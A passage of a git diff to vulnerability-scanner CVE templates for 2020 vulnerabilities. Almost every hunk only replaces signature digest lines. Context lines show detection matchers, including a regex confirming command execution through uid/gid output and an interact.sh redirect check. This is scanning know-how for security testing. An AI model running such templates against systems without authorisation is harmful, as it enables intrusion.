4a0a0047304502201b62f1d5a2608dfc99538aa5d5c6cbf107380194d132d5de236747d1f1f9d4b1022100dac2d3f5f1f33cc561551689bae39f6f952be69eac0104f257b5377ac189fa47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e1d33e39434a95c66a72423f9d56ffefb9c9ab0149479655d1fffbed2d1d070102210087e18d7a671eb2175181436334eeb9a11eee5d08516d3181afc89392cae2252a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml index 687f0d2eb3..8496846e45 100644 --- a/http/cves/2020/CVE-2020-11738.yaml +++ b/http/cves/2020/CVE-2020-11738.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200dff2f5d030b933dd091c1cc5d5cc7bc41bb0835f68632b19bb5ccf81c28a54c022100af3413a3f71258ca6527c452fcc6347aed1f04b206b65d670b39f9ab668536bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220376233aa3d60f905326b18aa647bc3402f6c58f86069a0162d2ef0fc88f05b150220592e31cae3cbfd9039006d865a9346aafb9e5008ec11162730dd27a708228c40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index 8977168602..ff6efdaa32 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee09db1547c9925f293f0463f88b484cddfa389398144842302ca857f22c49b9022100e448a84faecb3de55840bac9ed9d2ef82a2148cb20c7ab2009853c094bc8b232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c984b4120b996bbef0cf8716b9ead26900e8d96ec06a86c1f7663b2a33ce8f6022025bd3891452811bcea356711b5fbeb5b777ff4b1ab4b6c1f7d9b001b3fe7663b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index 3a16c33146..1f8261e587 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022033b1824b2099506d33ae152e8f6b871edcc310cf7e1bf0812930027945ee9f0f02210085421718026b61ada4ae13ce6f76fea388bedf1822f4b1c618df461484ac34e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fbca8197710376066cbfdf1b153b10c2544cc93d0305c2e8d46e8a9e735c175502202a376c513397a3f0af050ce7176553a54fbf8848b6373c2c05f91250d1aacfbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index 4dc5e625cc..0148f407cf 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009dba018280edee240f269edfa1b4bcd0fec70e21842c23acb8f021c449dcf1aa022100be434604211e51a99ffc9878469c3096440bb73812008576a79a3647b6381665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec7ec7c827f691124e86f9d12e8a2953dbb6996851f1ea327c97a5255c0ccb8902210084a8006a75246356bf554e838ec99c2010d253176db50753dd51242829b60120:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index 73f440dec6..786452b790 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220785fff84f1ba734fc2b1d1b2286715afd8590a459acdea1a9c1da486d05800c10220115db2a1fb0e380d14eb4d2cf43edb4f3dbafcab6d12973021b10eb69952605f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220520def47cf41d39db9764de4e29118886332fbb7ac7c1e66053e66ba8cecdc4002204011cfb0b12f6f2217dd63b478e1bdfc00e75ab3a38d1b9842180c23de86361a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index 101e15d16a..0d9cd257c1 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -70,4 +70,4 @@ http: - '"execution_date":"([0-9-A-Z:+]+)"' internal: true part: body -# digest: 4a0a004730450220441da54a8a0a89a0e28a9a26a7fc752d53efca83406dba40339f6c9ce40d928d022100f3031c6e8c475b4a873d73d095e066128ef126c3c7aa9cf473df34f7ba5a2f6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec5561e5efb8b2c33536dee5f80cd1dc04b2f2f8d911d41f61fb6510cfaa00cc022078d5beb2e8a882b763c26450a112c6198d39f072c8cc97bada8e718b4098c8db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index a04b05015c..791f1581fc 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022016df2511df9587d2e1a21d59a71e3598c4f666acb51d03d55d3877ee6e3976040220787814d8c0cecd08ab442e0a8d29b441bac92c91492a482328322906b431ac95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f65493a09dd0f9ea2ea15ecf4b644afff1b36eecbe49962e13e6fdcb0a592290221008af849f7ec11cfeee9b4c0aceb55bd0574f4c22f435106f786807de0a4d6a4ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 37371082c8..4e68271ed6 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100db708e082a8ba3d59091821632d7f2241b495b3932aebc1de6d324cc76bdbcd9022100984ecb6f768fc8d248166e2f3916daa1a37999edc2146bbb3ba81da8931397cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c4cb19a5b591246f4751759ed249ea4526a7dbd298b8ce44acd57ec4a092ef2022017775560f420bcf3aae62045ccb383458c9db155a066649a99634a7d6ab4b808:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml index 4e1062166a..a9f496129d 100644 --- a/http/cves/2020/CVE-2020-12116.yaml +++ b/http/cves/2020/CVE-2020-12116.yaml @@ -61,4 +61,4 @@ http: - "(?m)/cachestart/.*/jquery/" internal: true part: body -# digest: 490a0046304402200fc5ad9bdb1cc7520cf23bdb7395e0d52813c4184fa6a1b953bf69abf71b04a602207241ce6f30a6867e7c54ad6c3c2b7f7d2baf83ec792ce0c9e0b0a1ae5bd4243e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0e377e1afe6fdc3daf7edc6c70d824f0a54efeb4eb6d89b1bfa01196392a03602203cbcc8aeb298a562503efbcd3a2ff63b4182f879764eb4c3534f289543a517ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12124.yaml b/http/cves/2020/CVE-2020-12124.yaml index 4c41b1da66..54d260aab0 100644 --- a/http/cves/2020/CVE-2020-12124.yaml +++ b/http/cves/2020/CVE-2020-12124.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022013b21c005e3c657c433da224d005da53b149eeb80dfd4a028acd677b578ee5b6022054d78001a87409fc8d1a6988d3013a2efcf687ac9dd00c898b55d79cecbe548e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220795152aa32a35e7fbe4358c91ef9a136a0c2f45a24ea115ee6479ad52e2b2618022028ae4d2a2ed3350078252fa7da5ca698e60cd09022b6563061613a515bdc94fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index 6706323876..e675e097b6 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dffbff0cc3444989ae4c3286f2188aabc64aed833325784119cb5011f1a954ba022100a340bd327ffe1705d7ab2e5a234fb95df02461a432dbbafbcf937d1d7da6f52a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041fc4a93343cc62354b57374ec45f7cd5a84e59af1c642d5fba35345c34a235302203015c1b23e2792b32c79b0b38c69d806398122e34347e933371b36303a90936d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml index b07403baa8..2ef7a5398f 100644 --- a/http/cves/2020/CVE-2020-12256.yaml +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' - 'contains(content_type_3, "text/html")' condition: and -# digest: 490a0046304402203df7f7a1fafc6740fbc98163bb2959e9bd581ba8ddfd68573ca0af9a64f081ab02202b23a11ef0e6910123ef3657ed3d2374c3748e4f25a59b1d9d7f2e20b40dd381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a5d46e1a75e95843239ba55abc32a04e3e41c77f5ebad433590c4a4f76dbca6b022100c8e26649d9eebb4f0d5e297ea0b0d9275c73433afc8236006fcc7fd45d250b64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12259.yaml b/http/cves/2020/CVE-2020-12259.yaml index fcd1884b16..3c8e1872fd 100644 --- a/http/cves/2020/CVE-2020-12259.yaml +++ b/http/cves/2020/CVE-2020-12259.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' - 'contains(content_type_3, "text/html")' condition: and -# digest: 4a0a004730450221008538b08ecf8b93aacaac1be17c9980fbd0271e09e3a6e8cc79cfa36012a6d45d02203407d4ecb1e8ce517abd06804bf82b38a837a545c09169a361bbf6dc879e332a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203e9084da67e3006f0387cb9636665ca433dd03cdd88a6792b914aced10d7feee022100f0b9a95672eb658a37cc5b7d5cd5585fa45c9e935c96261f9f805e03a2761a53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index bb9a8edcc2..dc8fc74848 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d6f70c837b7c35ddacae603e0c1e3daa72b7f9d47c89a8c75302c0c8ed6e58d9022013c29b988bbbd1e577d673ae7d7e7f5afcb4c3660336ac45125a6db251230793:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c3ed4c33c607da7e95a503d9f74d3faa7e79e2803afc11350dc9302994de26c0220286df5517488e25a05d7072e07a17a439242b6ac2f012cc35d48207d473d3676:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index e2af8fc0b1..b15acb6d9e 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -47,4 +47,4 @@ http: - type: word words: - "vbulletinrce" -# digest: 4b0a00483046022100dd5074caccc4bc33e801e2c155340a006861f84c7b9080cd7c472e2e80fe4689022100c7a4fa68dacccc39599985db84023c514f3e71b07dfa295da29f38998e823d17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220384e4b7f73e12c09a9104d50eec11bdc5c9561667873cc3e5db56d929a34b1d80221008c6087cb158ea59018cda2a63fa5ccf7106e349817823c85d91af27b2ae8ab95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index 640c6ca27c..fbabfbe30e 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d359f7dda8bb47704e25df9f6ccae4b6c5ae50d87a2f8d96862170e8a3fae74b022100cc9091e18385d3d1fe499c692c8b9095062aaa9ea0f09ddb06e82dede501eb36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b225f0187a717218d847a35667f4ff5d428a737cab684bf9de67b2ca0baadfc0221009b3f8d05d5e46a2c3ea0a47cb90996367471d4fd0a11e620afad2fcf1cb40259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index 883a1ca735..2084b341c2 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502206f176277eec35ef135b67c205d1cdacbf6a6d6a914b0330fc921447e4d77f10a022100d548e0e86bb67accdbea62a2cb11ff6fdfd956cb47edb0909e50b0bb2324b033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206d5139608b72b6f1bc8113be66f7f9ef151af099ff74bd9a595fbe88734f52ae022100e4b539eca28305c2bfd5fa8b99eaa4c9f56de7cfc1103aa3c2acba9d4ebcf7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index b476eca5c0..d69482800d 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205aa5e4fc4a2fc1a974f36ab4c73ca7f8d970a1a6bd7e14394f238fa34179b721022061838c49e3fa2d0486bfc7a85f72858cbe25daf49758350e33522632ea43a507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cfd0feb375bf270992992aff4bfce7cb1c16083492ec7dda8a3d92853e94e61f022003ee91334e3781da2a8be1d8bad718327c570093b1e428e9ba43416381e46b97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index ba0ef6dbf0..021127a62c 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008c62562d86e9062675832a60abae347f5564380cd4d1f3143a04618fc023ca9a022100c69d9b44376226c036805afae776400ac22ff3adc49ae438eefea5c81b5aac9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009c3a8dc44a99fe2867c19eea945150fb1894eb9235112ddf613bb77aabc8a3f8022100d55021421a7e4d24d6f8b449f29dac9b65a9165d6223b22ce1301e90ccdbfe9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 4400abd5e1..0f7eb19754 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022027c5f2643bd4cd615440112890d0d23c6b5ac5613534bf20e9b6c3f6e67fdac90220773833d83834dbacee963a6c0ea63557e73c73e473d68647ce026eb13c287f16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205300c082ee82da57fd2dfd61a0dd103c9313fde822a16acdc768269bac9848350220414dbe60e7d7cd8516684716cdf6ef8539473b971dbea94b7aa27ae9763526e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 539fe48087..030220caea 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205b9bd2aa77748627d7df56b1f9ddb380e47285274318cb1a472d118ac7ea5dab022100e2b67b3e80048d92b7de1e74b9a632e18562312f42d046e47dde1538b01001e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f29320d2392721f52b8fc82f127b190c169028bbbcf1719d0e8b6a5b0997f6db02200de0fe74bc47b582d91beddf16f7fbea0a48d9cc52567ead016ae0b9ac1a5ba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index 1f48e0ba99..99a739faf3 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -57,4 +57,4 @@ http: - 'status_code==200' - 'contains(header,"text/html")' condition: and -# digest: 4a0a0047304502203be4d7f5e6cf689779af0571cd7edda9bf8975e0a39de1da9a717cdacffd438c022100c9e14eb45b1c3245277acdf5ad2abab89ea79fd9fac04a3de2d9acfd1d80f272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c096626cafed20dbc9030c3e648a3a819e994aca4d10317129168bc8c75ad8a022100f168d1a5fe31a255db5c80e489a4b64ad9398e69df692ea05e41a8a6a063375b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index 48c121e71d..fd91ebc8a2 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c969dd14c4d494d022ccf2ee1851599d1a39f7853ce81508bbd20845162ddd8002205f3fb9d87eb78e066c23780860090f71d04bbfcc09ec204574049849d98b144c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022029343ebc38d2dfc9915247a5347f0cb9d35678dfee04d9ffc97299f18e678b660221008aef7a72fe4381a4c785e769b503bd48816987aae9d68f12fe3c47f9855ab647:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml index 6efcb4aba4..92ca22db2a 100644 --- a/http/cves/2020/CVE-2020-13638.yaml +++ b/http/cves/2020/CVE-2020-13638.yaml @@ -98,4 +98,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e7f135f57aac986c270d66ef6afc8f90e89fd565b52145eb6316f4a20da0e4b5022100876e3b9f1953ea0c2910db7241c0c1297552adc50ced66724b0c4758e85e790f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b3478a3d1c9b33da6b94260e9b8106a998818c2fdb902a9b066d1c7ac809980b022100b3023fdeea2e412f562cf99d872c7461a958b671cd1be9c09e039c7051f3922c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index ac464c303a..bedcfa1f6d 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203b2fba8721ad31fdedf35ac64fd1aa9f3daf248c5a28d0e177bc476aef75fc3b02207c1ceaaceaae8e7f5b2fb30ff8a741683dff8b8466099618f50ab7e864979a62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce13b74076da6e41969c97df7180572b27b2059ee09671905e529bea9d0d559602201a6df1809806daf4998b799697f290e982464680a2e487ba3351b922de9a5c44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml index 49e673cb9c..f193789ad1 100644 --- a/http/cves/2020/CVE-2020-13851.yaml +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022058dede621391a5c5aa3cbab99614f6e05eb1c25d174cb444fc225088cfc531a3022100d43ab48e876ed266cffa72d5a17bcaf610d3d10d131b046556958fd7be786cf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dfcfb03696c918a1d2747fa228cdf2eaa55b60a14ed1fb030a247100d1586849022100f942bcad8c6242916817db978bfc93199bdc8ce554420e795293b554ca8d1364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 11a748d533..45a1234b6f 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -47,4 +47,4 @@ http: - '"dag_id":' - '"items":' condition: and -# digest: 490a00463044022039773e3df5e30a54dfb047b567020f8006e6597a61396e83cb36083fa06404a602203435f7eb2403447cd3c27da2a7077ecde3b5ea1c3a9079a9574e26a7831f06b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210089cb49c5ce487c095f5369f8734137a3c3d88fd03971899ea3555491c97381a202206551832746d04cb3b44e1eb98ca8aca17348cd625b1791071c1dfc9b3f801d86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index b6066bb5c7..3b19af5630 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210092081ead1b869e9dda724782ee4de965bc0f0e116474ed366f8d370a14dbb07d02204a4b6cb67c83309c810d2b386aab64f87d5aa13bb183687f94890e463204b1a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022048463394a260b9e27d8627767494475565f239aa91435a34230d9ff1a6c5bef202202a54d4b9e4a760b03d0247fe9be21b805bd7a370bfe03b66fb302310841fc7a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index b38f01fd33..6d90732cdd 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -71,4 +71,4 @@ http: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" -# digest: 4b0a00483046022100efbf11bb66cb565f79edd3f4a95a75ca6939ca6c573155b78208a326bae668400221009ed2eceab8a745e0240bfe7e993f27535e64fdb38bc0758e3f0b33fb42d75345:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100da98ecddbb70a7eb77581e9653fa92b9b159de88c75124492bd32b43a2ea50440221009ebe7190fff83e639145fb240a154245ae8fb4698cae8117916ab2e97469c4d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index 036c2396dc..5e498b43ba 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -102,4 +102,4 @@ http: regex: - name="last_commit" value="(.*)" internal: true -# digest: 4a0a00473045022100e398d9d82ff8b9b88f71c78ed86a11cd12d18203426a0f2396f654d19d04022a0220753f0b26dc09689a5afbbb739a698e8340f6bb5296ac8e88f3fc93d75ab2cd3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201f18aedbdadeb2cdc5f30ea26b1d4d98caab9e7ce93029b2fcf5d13b85b935e00220575847d9f812393e7c02727855728df354924f517696bf51d39c47e9a5fcf01b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index 643a09d2cc..562498ec4e 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210096f095a7e5b1890aec761ba02f30068376572d358c7b7f2377be52b71bafe88c02203feeb9b688c168e5c644f45bc6e2e4031cd7a2f541d50bf68d50e45bb9ebd6e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c3492604fe6ffb150d983c57a55822a1ccaf9544c9acef5270afebceca826124022100bb7cead7683c1f14153ce2f193c2ae3534ffea422cc659852a30be1b6dca1726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 030185bfaa..bd7e1f4460 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204aa72378f1d38af3a56bbb872653fe90f1d82c08a7a5a4c2599987f2b07a3a9d022100ad34ea3f11b966b88af4d8f227f8e9b46f7032332c327e80e59e9cd963e2406e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d428c575ce432ed99a51090d8663c82a58604fbcd255a72dbc8032aa665c4d18022100fe7fe775dda4c6526f5df535684f57b1456845031e1b23d41a6b3a5b4da29305:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 252fc0ba2b..8311477ae9 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d9c05fb3baf867f35afbb4c5ecbc371b317d9ad9a8ce6ccb6c7fdbc1f3231cf902207c1160d456c6b712685c5c2f9c8f5a2c8102f6d5ec75ce531f6daa39b39f4bd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038504a32912735d1e070f9e8d7a17e38206b622b7dbc2246ed290d9c713625c5022055df1771eb09041fa2e67b1dc2cc61d43bb6f7d3a7ce0bb5143ee665ebe2785f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index aacefbd84b..bee192e25c 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a17974c94baa6f004137cf8899e0977bd37030e412c83a9d74273c6477095cfe022100ae2ba0fe9043f67069286b217dd44873f67f994fd877249b7dc65282d21d5c70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a25b67d8e501fe54a9736f4b60284269c3b3ce22055d5909a746b02bd595b7d70220335a4d343367dbfe91fedd1ae1344d4196d2a81e16b66e21c40e8d4b548e1827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index 3dff27eb2f..41b8fdbff3 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -76,4 +76,4 @@ http: part: body regex: - '(.*)' -# digest: 4b0a0048304602210089aca28d5d41776ea96aa0bb6616121eee0ef6ec762a650669fc5f6e650aab49022100c700af3059d9fd95fe63ddec43493d48232678dc50bc266a2f8cfaa26d4fcc09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100933ccbbec69c077cf18a07ac71b7a7c533757dd74da93f9010e54cbaa4fbac4a022015131136b25176aa3e188cae6dc1fde89694980c36382c03a062806340676340:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index 012e341c56..8d8250b76f 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 